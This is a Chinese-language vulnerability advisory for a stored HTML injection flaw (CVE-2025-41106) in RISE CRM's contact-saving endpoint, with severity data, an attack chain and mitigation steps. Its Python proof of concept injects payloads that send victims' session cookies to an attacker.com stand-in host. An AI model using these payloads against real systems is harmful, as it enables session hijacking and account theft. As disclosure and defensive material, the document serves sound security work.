CVE-2025-41106 RISE CRM Framework HTML注入漏洞

漏洞信息

漏洞编号

CVE-2025-41106

漏洞类型

HTML注入

CVSS评分

5.4 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

需要交互 (UI:R)

影响产品

Fairsketch RISE CRM Framework v3.8.1

漏洞概述

CVE-2025-41106是Fairsketch公司开发的RISE CRM Framework v3.8.1版本中的一个HTML注入漏洞。该漏洞存在于客户端联系人保存功能中，具体位于'/clients/save_contact/'路径的'first_name'参数。由于应用程序缺乏对用户输入的充分验证和过滤，攻击者可以通过POST请求在first_name参数中注入任意HTML或脚本代码。当其他用户查看包含恶意代码的联系人信息时，这些代码将在其浏览器中执行，可能导致会话劫持、钓鱼攻击、恶意内容展示或进一步的社会工程攻击。此漏洞的成功利用需要攻击者具备低权限用户账户，并且需要目标用户进行一定程度的交互，如查看联系人详情页面。CVSS评分5.4分，属于中等严重程度，攻击向量为网络，认证要求低权限，用户交互为必须，对机密性和完整性的影响均为低。

技术细节

该HTML注入漏洞的根本原因在于RISE CRM Framework的输入验证机制不完善。攻击者可以通过构造特殊的POST请求，在first_name参数中注入HTML标签和JavaScript代码。具体来说，当用户访问'/clients/save_contact/'端点并提交包含恶意代码的first_name字段时，系统直接将用户输入存储到数据库中，而没有进行HTML转义或输入过滤。在后续页面渲染过程中，这些未经过滤的HTML代码会被浏览器解析执行。攻击者可以注入诸如<img>、<script>、<iframe>等HTML标签，或者使用事件处理器如onload、onerror等来执行JavaScript代码。由于该参数在联系人管理模块中显示，攻击者可以利用此漏洞窃取会话cookie、篡改页面内容或重定向用户到恶意网站。建议的修复方案是在所有用户输入点实施输入验证和输出编码，使用HTML实体编码转换特殊字符，并对所有输出到HTML上下文的内容进行适当的转义处理。

攻击链分析

STEP 1

步骤1

攻击者获取RISE CRM Framework的低权限用户账户

STEP 2

步骤2

攻击者构造包含恶意HTML/JavaScript代码的POST请求，针对'/clients/save_contact/'端点的first_name参数

STEP 3

步骤3

受害者（其他用户或管理员）访问联系人列表或联系人详情页面

STEP 4

步骤4

恶意HTML代码在受害者浏览器中执行，可能窃取会话cookie或执行其他恶意操作

STEP 5

步骤5

攻击者利用窃取的会话cookie劫持受害者账户，进一步扩大攻击范围

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests import sys # CVE-2025-41106 HTML Injection PoC # Target: Fairsketch RISE CRM Framework v3.8.1 # Endpoint: /clients/save_contact/ def exploit(target_url, session_cookie): """ Exploit HTML injection in first_name parameter """ # Malicious HTML payload - steals cookies payload = '<img src=x onerror="fetch(\'https://attacker.com/log?c=\'+document.cookie)">' # Alternative payload - cookie theft via script tag # payload = '<script>document.location="https://attacker.com/steal?c="+document.cookie</script>' data = { 'first_name': payload, 'last_name': 'Test', 'email': '[email protected]', 'phone': '1234567890' } headers = { 'Cookie': f'session={session_cookie}', 'Content-Type': 'application/x-www-form-urlencoded' } try: response = requests.post( f'{target_url}/clients/save_contact/', data=data, headers=headers, verify=False ) if response.status_code == 200: print('[+] Payload sent successfully') print('[+] Payload:', payload) print('[+] Victim will execute JavaScript when viewing the contact') return True else: print('[-] Failed to send payload') return False except requests.exceptions.RequestException as e: print(f'[-] Error: {e}') return False if __name__ == '__main__': if len(sys.argv) < 3: print('Usage: python cve-2025-41106.py <target_url> <session_cookie>') print('Example: python cve-2025-41106.py http://target.com "PHPSESSID=abc123"') sys.exit(1) target = sys.argv[1] cookie = sys.argv[2] exploit(target, cookie)

影响范围

Fairsketch RISE CRM Framework v3.8.1

防御指南

临时缓解措施

在官方修复版本发布之前，建议临时采取以下缓解措施：1) 限制低权限用户创建联系人的功能，仅允许管理员操作；2) 在Web应用防火墙（WAF）层面添加规则，过滤包含HTML标签和JavaScript事件处理器的请求；3) 实施输入白名单机制，仅允许字母、数字和常见标点符号；4) 对现有联系人数据进行清理，移除潜在的恶意代码；5) 加强对用户输入的监控和日志审计，及时发现异常行为。